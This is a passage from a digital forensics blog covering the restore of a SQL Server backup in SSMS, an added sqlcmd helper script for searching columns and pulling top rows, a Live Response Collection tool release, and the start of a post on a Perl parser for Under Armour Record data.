<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKkwOhChKZIMJ9mJPTln35NYKKTmYUxHHL8oYnvP89NxMGI-9TWJEIbJ4n5r5jhXYQLo96Pm7XsVfdBq6QAh8zibQHPYfZU1GxPnhU5Zs5Fh7bj5ye23NNjVL_HXLJ48HeqMyD05vxui4D/s1600/loading-packages.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKkwOhChKZIMJ9mJPTln35NYKKTmYUxHHL8oYnvP89NxMGI-9TWJEIbJ4n5r5jhXYQLo96Pm7XsVfdBq6QAh8zibQHPYfZU1GxPnhU5Zs5Fh7bj5ye23NNjVL_HXLJ48HeqMyD05vxui4D/s640/loading-packages.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Packages are loading, this may take a bit!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once the installation is "complete", you will have to restart the system in order for the installation to "complete" (because it is Windows, after all!).</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5J1C1zEdczOa0Ppsr9Kx73F-1BNqHF6It-A8cEffNjySdzv64HyQXBy9utyL5r5rLlfrFxNmYhMN9b1GxCC-WIO9knMXsBRGYJ3p6N9jC8bKNta2J9wLTu9QKvUVKSBWjq4CF9piAuJQn/s1600/restartforcomplete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5J1C1zEdczOa0Ppsr9Kx73F-1BNqHF6It-A8cEffNjySdzv64HyQXBy9utyL5r5rLlfrFxNmYhMN9b1GxCC-WIO9knMXsBRGYJ3p6N9jC8bKNta2J9wLTu9QKvUVKSBWjq4CF9piAuJQn/s640/restartforcomplete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Installation is complete, but we have to restart to complete the installation. Huh??</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><b>Step 7: Launch SSMS & restore the SQL database</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now that SQL Server and SSMS are both installed on our system, we can launch SSMS. Navigate to Program Files and launch the executable. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJxFLqOov-JGU83y18HlIDDpNpZ-WKkuX-8LsG-NB2u93Vcy8g-HBak12pnLkwv0YICrY3393kQ2OAVB2oB3RPCRFtpmuvegZxriLQN-_fdl51aDdcHcvNhpnPcfpPUqNh-30epuAmXkdU/s1600/Launch_SSMS.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJxFLqOov-JGU83y18HlIDDpNpZ-WKkuX-8LsG-NB2u93Vcy8g-HBak12pnLkwv0YICrY3393kQ2OAVB2oB3RPCRFtpmuvegZxriLQN-_fdl51aDdcHcvNhpnPcfpPUqNh-30epuAmXkdU/s640/Launch_SSMS.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Getting ready to launch SSMS for the first time!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There may be a brief loading screen for user settings, then you should see the SSMS console, complete with the Connect to Server Window.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF69RrnRnvGLnW0WIYLFd44vFMqGL-c3HgygCi-FIHeZcrf6ILZq1BXdZK4eeTUQejyU_qyAnF5gNc1D_GGJ1_lqh6SE7Y0Bgx78SrpUhfvjMYKj5_AA3HkpCeg4uVgXmwljCgkzDq1FjK/s1600/ssms-console.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF69RrnRnvGLnW0WIYLFd44vFMqGL-c3HgygCi-FIHeZcrf6ILZq1BXdZK4eeTUQejyU_qyAnF5gNc1D_GGJ1_lqh6SE7Y0Bgx78SrpUhfvjMYKj5_AA3HkpCeg4uVgXmwljCgkzDq1FjK/s640/ssms-console.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">SSMS main console</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">All you should have to do is click the "Connect" button, and a tree view of options should appear in the "Object Explorer" window.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg2Pf3oFGt4U2ovbTlCjhRIdx41MsItX7dOMKkiWknZ3N8lFl1hqW7icbxpCbsN2gbylLPJxaAhrAA0Tj9Wj5J8MYfh3ls-M29KFg_SlQ1T71mDYZ30rjjqc5XP0ncVWUWzkP2Vbm8mTuP/s1600/ssms-objectexplorer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg2Pf3oFGt4U2ovbTlCjhRIdx41MsItX7dOMKkiWknZ3N8lFl1hqW7icbxpCbsN2gbylLPJxaAhrAA0Tj9Wj5J8MYfh3ls-M29KFg_SlQ1T71mDYZ30rjjqc5XP0ncVWUWzkP2Vbm8mTuP/s640/ssms-objectexplorer.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The "Object Explorer" window is populated</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">We are interested in the "Databases" option, since we are going to be restoring a database from a backup file. Right click on the "Databases" folder and choose the "Restore Database" option.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOGCsblYOpbnQP7wfGhVRDW4Z9uYAmItzL20knV_3DxXtCftX7TwpyCjLACZSW5gGLfmJTika3U8bJh_T_HHfRWmxwLt4tyA4nxXsrwB-swQXh2rqr87321FwrrSeMs-027sV8lp1i8Q2Y/s1600/ssms-restoredb.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOGCsblYOpbnQP7wfGhVRDW4Z9uYAmItzL20knV_3DxXtCftX7TwpyCjLACZSW5gGLfmJTika3U8bJh_T_HHfRWmxwLt4tyA4nxXsrwB-swQXh2rqr87321FwrrSeMs-027sV8lp1i8Q2Y/s640/ssms-restoredb.jpg" width="552" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose the "Restore Database" option</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Now we will get a new popup window that is labeled "Restore Database".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMSbir8WcSlljEyypFw3_d5LdrbbnmSWiRHfyH7d9j4vV95qqwYWb8k0lr2jqtbm9upc7cpOEzaol7tAx67vqy6DaOqs4GDhl4wYD1ne1ctC3zJlrO1tLnGWK6umQQnePNXQMSZdjJWin/s1600/restoredb-popup.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="564" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMSbir8WcSlljEyypFw3_d5LdrbbnmSWiRHfyH7d9j4vV95qqwYWb8k0lr2jqtbm9upc7cpOEzaol7tAx67vqy6DaOqs4GDhl4wYD1ne1ctC3zJlrO1tLnGWK6umQQnePNXQMSZdjJWin/s640/restoredb-popup.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The "Restore Database" popup window</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">We are going to choose the "Device" option under "Source", then click on the box with the three dots.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtyTEsHFdkw052FYZocRDKHjnGa71ZJbooZ5D3CG9Ckx6O9wzE_PGmZl6_Yr_ckR1BolUSUqm5qBKkPrROJCoauJteVZHCKE1LeQbepSk0pmSvGy8vpodK7fnhCfrNhyphenhyphenHOCsc-KmC_J49/s1600/threedots.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="564" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtyTEsHFdkw052FYZocRDKHjnGa71ZJbooZ5D3CG9Ckx6O9wzE_PGmZl6_Yr_ckR1BolUSUqm5qBKkPrROJCoauJteVZHCKE1LeQbepSk0pmSvGy8vpodK7fnhCfrNhyphenhyphenHOCsc-KmC_J49/s640/threedots.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Tick "Device", then click the box with three dots</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">This brings up a new window titled "Select backup devices". Our "Backup media type" will be File, and we will click the "Add" button to add our .bak file (PRO TIP: saving the .bak file in the root of a drive, such as "C:\", makes it much easier to find and navigate to). Select the file and then click "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWCOr1qPE8ZeIiOYhXsFWL9lyVhwWiZeSrSdZ7CRWG8prTi14ow6-kWy1qe8xGSgz5t8fezGQ6NvK5XP1c7sQuFWmPzEjR4El21H4aEpsytO0LLZN5NbwzcS4-eQWa3WeMFSXeWuPS_tA/s1600/addbackupbox.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWCOr1qPE8ZeIiOYhXsFWL9lyVhwWiZeSrSdZ7CRWG8prTi14ow6-kWy1qe8xGSgz5t8fezGQ6NvK5XP1c7sQuFWmPzEjR4El21H4aEpsytO0LLZN5NbwzcS4-eQWa3WeMFSXeWuPS_tA/s640/addbackupbox.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Click the "Add" button</span></i></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEievbWYhyphenhyphendiKUaigYUGE4C5Is5vcO69I0yTQ5qJ2J5EBQs82PKl2OZyUVXpQgPLoX0m3geYV9xuZWc580_BZ1tQslikIQW48Jhdv9belebXh-nylpXKawtlmNKRL2NRbltWyGOn5_Ns3qH0/s1600/addingbakfile.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEievbWYhyphenhyphendiKUaigYUGE4C5Is5vcO69I0yTQ5qJ2J5EBQs82PKl2OZyUVXpQgPLoX0m3geYV9xuZWc580_BZ1tQslikIQW48Jhdv9belebXh-nylpXKawtlmNKRL2NRbltWyGOn5_Ns3qH0/s640/addingbakfile.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Browse to the folder containing the .bak file</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now the "Select backup devices" window should be populated with our backup file. As long as it is properly listed in the box, click "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQfZFkDFuGFO1sUsPg33EwftivtV5irLiz-3esjhho7fKoVvZ0l6WBteoYyd0OUmlqgJLRVKCaeyZ2cklfUNN31hWJPRfgsmdjND_3w-_7yJyzoaEkNWZXkBRUof6L2mUkUbQXhNoIkj8/s1600/inthebox-clickok.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQfZFkDFuGFO1sUsPg33EwftivtV5irLiz-3esjhho7fKoVvZ0l6WBteoYyd0OUmlqgJLRVKCaeyZ2cklfUNN31hWJPRfgsmdjND_3w-_7yJyzoaEkNWZXkBRUof6L2mUkUbQXhNoIkj8/s640/inthebox-clickok.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Select backup devices is now populated!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">There will be a pause as the system processes the information, and you should see the box under "Backup sets to restore" populate with information. As long as it populates properly, you can click "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEganVUvn1O15l3Fg_zQ5Z0j4LY18M24sh22j3fRJeQHX4_gulE_JDIBOihdXzsftneYto_2oDhH4XCbV8QhNGVi3-kNCWs_swLWKThAxDD0xWuyNP2YVVmYdvzQ8GP-CcjQ6BchM8zEuMWM/s1600/backupsetspopulatedok.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="564" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEganVUvn1O15l3Fg_zQ5Z0j4LY18M24sh22j3fRJeQHX4_gulE_JDIBOihdXzsftneYto_2oDhH4XCbV8QhNGVi3-kNCWs_swLWKThAxDD0xWuyNP2YVVmYdvzQ8GP-CcjQ6BchM8zEuMWM/s640/backupsetspopulatedok.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The fields are populated, so we can click OK and let the backup restore process start!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">The restore will take some time depending on the size of the database, but once it is done the database is fully loaded and we can start making our queries!</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDaugtLZ14dYsNkP2zMgRzKdSMuUIQt-iqGnI9DbMNZt5d7DtE4H43RU5evBterlYvY6ckxrdAodDi1E-WpBsbKDGZqHISaR0LMTuktLxHnn-U6BI3TclBxrd1DPGBM-VtLcfmh5t4vCSF/s1600/restore-complete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDaugtLZ14dYsNkP2zMgRzKdSMuUIQt-iqGnI9DbMNZt5d7DtE4H43RU5evBterlYvY6ckxrdAodDi1E-WpBsbKDGZqHISaR0LMTuktLxHnn-U6BI3TclBxrd1DPGBM-VtLcfmh5t4vCSF/s640/restore-complete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The restore has been completed!</span></i></td></tr>
</tbody></table>
<br />
<b style="font-size: x-large;">Step 8: Make your SQL queries using SSMS</b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once the database is loaded, you will see it under the "Databases" folder.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2QpMGG5XxBAOtOANGyshCB_zU65ZqH4Ee9M_2kWs0arpvJSiriG4CrETiMuOCqjm5Sc_TsPbRiIX3qYZET6lGSfQMmMpQK05aKv0LqoDuAl5xQAGPywwqhB9PetO9DFo5uN_1fpbGPhTk/s1600/databasesfolder.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2QpMGG5XxBAOtOANGyshCB_zU65ZqH4Ee9M_2kWs0arpvJSiriG4CrETiMuOCqjm5Sc_TsPbRiIX3qYZET6lGSfQMmMpQK05aKv0LqoDuAl5xQAGPywwqhB9PetO9DFo5uN_1fpbGPhTk/s640/databasesfolder.jpg" width="514" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The database, seen under the databases folder</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You can expand the database and see all of the associated information, but more than likely "Tables" is going to be the main area that you focus on.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2MmziNVHcQBxKmpVpDK2MQjrNHV23DD0bpCCo4lUw82O3hmCA7-HKEMAnxF6BDo3owmLqERtMFm78Yh3Syz2RZeLaWpsohFDM8SCL9lZnZAxQtp-ZaV02ej8oN8WbMAgwY5vDPmZd56W_/s1600/dbtables.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2MmziNVHcQBxKmpVpDK2MQjrNHV23DD0bpCCo4lUw82O3hmCA7-HKEMAnxF6BDo3owmLqERtMFm78Yh3Syz2RZeLaWpsohFDM8SCL9lZnZAxQtp-ZaV02ej8oN8WbMAgwY5vDPmZd56W_/s640/dbtables.jpg" width="362" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Some of the tables in this database. There are SOOO many tables!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Thanks to the power of SSMS, you can actually use some of the preconfigured queries to get you started!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgObllus_E1dHTtU9fCFHpEPqV0l6OB8mwJ7fbPGY_bMH12Ha4CKGucp-tcIUwmX53eMTwAwEDJNxrdNA0Bf_dh_SN2pZcL_0eCVvl3qEMuBgTHYq7uH4JkW3hX3Z3au1Cu2jyfNxo6jSWg/s1600/builtinquery.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgObllus_E1dHTtU9fCFHpEPqV0l6OB8mwJ7fbPGY_bMH12Ha4CKGucp-tcIUwmX53eMTwAwEDJNxrdNA0Bf_dh_SN2pZcL_0eCVvl3qEMuBgTHYq7uH4JkW3hX3Z3au1Cu2jyfNxo6jSWg/s640/builtinquery.jpg" width="336" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Some of the options. "Select Top 1000 Rows" is your friend!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You can select the top 1000 rows and then build out your specific queries from there, however you would like!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqame_xb8amaa3rIGSXZWdTFUzHQ-btAREfxvw2TO0jMByqGDmQN8XpsHI2CbENHsbqa7-AwyhfRyEHhTJsAgHLZas7EhegbhS03BnDN53Jw9USv54seASuAU_BhuOrcaEpGiOCU1fwdC9/s1600/selecttop1000.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqame_xb8amaa3rIGSXZWdTFUzHQ-btAREfxvw2TO0jMByqGDmQN8XpsHI2CbENHsbqa7-AwyhfRyEHhTJsAgHLZas7EhegbhS03BnDN53Jw9USv54seASuAU_BhuOrcaEpGiOCU1fwdC9/s640/selecttop1000.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The results of selecting the top 1000 rows from this particular table</span></i></td></tr>
</tbody></table>
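<span style="font-size: large;">As an added example (not from the original post or from SSMS itself), the shell script below builds the two queries an examiner reaches for first in an unfamiliar restored database: a keyword search over INFORMATION_SCHEMA.COLUMNS to find which of the many tables hold, say, user names or timestamps, and the "Select Top 1000 Rows" query with its identifiers bracket-quoted so a table name taken from a case file can never break out of the statement. It runs the T-SQL through sqlcmd (assumed to be installed from mssql-tools); the server, database and keyword arguments are placeholders, and the generated T-SQL can equally be pasted into an SSMS query window.</span><br />

```shell
#!/bin/sh
# Build the T-SQL an examiner runs first against an unfamiliar restored
# database and run it through sqlcmd. Added example, not from the post or
# from SSMS. Assumes sqlcmd (mssql-tools) is installed; server, database and
# keyword are placeholders supplied on the command line.

# Quote an identifier for T-SQL [brackets]: a ']' inside the name is doubled,
# so a table name copied from a case file cannot close the bracket early.
bracket_quote() {
    printf '[%s]' "$(printf '%s' "$1" | sed 's/]/]]/g')"
}

# Quote a string literal for T-SQL: a single quote is doubled.
sql_literal() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/''/g")"
}

# T-SQL that lists every table and column whose name contains the keyword,
# the fastest way to find which of the many tables hold the data of interest.
columns_query() {
    kw=$(sql_literal "%$1%")
    printf 'SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE\nFROM INFORMATION_SCHEMA.COLUMNS\nWHERE COLUMN_NAME LIKE %s OR TABLE_NAME LIKE %s\nORDER BY TABLE_SCHEMA, TABLE_NAME, ORDINAL_POSITION;\n' "$kw" "$kw"
}

# The query behind SSMS's "Select Top 1000 Rows", with both identifiers quoted.
top_rows_query() {
    printf 'SELECT TOP (1000) * FROM %s.%s;\n' "$(bracket_quote "$1")" "$(bracket_quote "$2")"
}

# Run the T-SQL on stdin against a server/database, comma-separated output.
run_query() {
    sqlcmd -S "$1" -d "$2" -W -s ',' -Q "$(cat)"
}

# Usage: sh find_columns.sh 'SERVER\INSTANCE' RestoredDb date
if [ $# -ge 3 ]; then
    columns_query "$3" | run_query "$1" "$2"
fi
```

<span style="font-size: large;">Once the keyword search has pointed at a table, top_rows_query gives the same starting query SSMS generates, and from there the WHERE clauses specific to the case can be added.</span><br />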
<br />
<span style="font-size: large;"><br /></span>
<b><span style="font-size: large;">Step 9: </span><span style="font-size: large;">Great success! High five!</span></b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I definitely hope that this rather lengthy blog post helps in the event that you ever find yourself in a situation like this. It is of course much easier to get data from whatever database front end is available, but if you can only get a backup of the raw database, it takes some time and research to build up good queries to find the information that you are after!</span><br />
<span style="font-size: large;"><br /></span>Brian Moran (<a href="http://www.blogger.com/profile/10916463151597324052">Blogger profile</a>)<br />
<br />
<b style="font-size: x-large;">Live Response Collection - Bambiraptor</b><br />
<span style="font-size: small;">Published 2016-12-12T15:02:00.000-05:00, updated 2019-10-17T11:15:35.052-04:00</span><br />
<span style="font-size: large;">Good news everyone!! After a fairly busy year, over the past few weeks I have finally had enough down time to work on adding some long overdue, and hopefully highly anticipated, features to the Live Response Collection. This version, named Bambiraptor, fixes some of the small issues that were pointed out in the scripts: it makes it a little more pronounced that I am using the Belkasoft RAM Capture tool in the collection (an additional file is created in both the 32 and 64 bit folders, respectively, at the request of the great folks over at Belkasoft), it fixes the autoruns output being the csv file twice rather than one csv and one easy to read text file, it adds some additional logic to ensure that the "secure" options actually secure the data, and it includes a couple of minor text fixes to the output. The biggest change is on the OSX side though, so without further ado, we shall dive into that!</span><br />
<span style="font-size: large;"><br /><br />The biggest change on the OSX side is the addition of automated disk imaging. It uses the internal "dd" command to do this, so again, be aware that if you suspect your system may be SEVERELY compromised, this may generate inconsistent output. If that is the case, you should probably be looking at a commercial solution such as <a href="https://www.blackbagtech.com/software-products/macquisition.html#software-options" target="_blank">Blackbag's MacQuisition</a> to acquire the data from a system. Remember, the Live Response Collection is simply another tool in your arsenal, and while it does have some pretty robust capabilities, always be sure that you test and verify that it is working properly within your environment. I have tried my best to ensure that it either works properly or fails, but as there are different flavors of Mac hardware and software, it gets harder and harder to account for every possibility (this, along with the fact that I see way more Windows systems than OSX/*nix systems in the wild, is why my development plan is Windows first, followed by OSX, followed by *nix).</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">With the addition of disk imaging, there are now a total of three scripts that you can choose to run on an OSX system. They are self explanatory, just like on the Windows side. However, unlike the Windows side, you MUST run the script with superuser privileges, or else the memory dump &amp; disk imaging will not occur. (The Windows side is set to run automatically as Administrator as long as you click the proper pop ups; OSX, to my knowledge, does not have this option.)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I have purposely held off on releasing "secure" options on the OSX side because I want quite a bit more real-world testing to hopefully identify and eliminate any bugs before starting to secure the data automatically. The reason, again, is that it is more difficult to account for small changes that can have a big impact on the OSX side, and I want to ensure the script(s) are working as properly as possible before encrypting and securely erasing collected data, as I don't want to have to run the process(es) more than once because one system does not understand a single quotation mark compared to a double quotation mark.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I hope you have a chance to use the Live Response Collection, and as always, if you identify any issues with it, if you find any bugs, or if there are any additional features you would like to add, please let me know. The roadmap for next year includes rewriting portions of the OSX script to better adhere to bash scripting security guidelines, adding secure options to the OSX side, and adding memory dump & automated disk imaging to *nix systems, as well as continuing to add updates and features to the scripts as needed and/or requested.<br /><br /><br /><a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><br /><br />MD5: 7bc32091c1e7d773162fbdc9455f6432<br />SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63<br />Updated: September 5, 2019</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran (<a href="http://www.blogger.com/profile/10916463151597324052">Blogger profile</a>)<br />
<br />
<b style="font-size: x-large;">Public release of "allyouruarecordarebelongtous" Perl script</b><br />
<span style="font-size: small;">Published 2016-10-28T13:48:00.001-04:00, updated 2016-10-28T13:48:13.186-04:00</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back! This blog post is going to be short, as the primary purpose is to publicly announce a new script, cleverly titled "allyouruarecordarebelongtous.pl", which was in my "Who Watches The Smart Watches" presentation that I gave at OSDFCon on October 26. This Perl script will allow the user to parse out data from SQLite databases associated with Under Armour Record stored on an Android device and present that information in an easy to read format. Please let me know if you have any questions or comments about the script. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you would like to see the slides from my OSDFCon presentation, <a href="http://www.slideshare.net/BriMorLabs/who-watches-the-smart-watches-67789794" target="_blank">you can view them here</a>.</span><br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The script itself can be found on our github page:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><a href="https://github.com/brimorlabs/allyouruarecordarebelongtous">https://github.com/brimorlabs/allyouruarecordarebelongtous</a></span><br />
<span style="font-size: large;"><br /></span>
<br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Please note, in order to run the script you may have to install some Perl modules. On a Windows system, open a command prompt and paste the following command:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>ppm install DBI DBD::SQLite DateTime IO::All</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">On an OSX/*nix system, open a terminal window and paste the following command:</span><br />
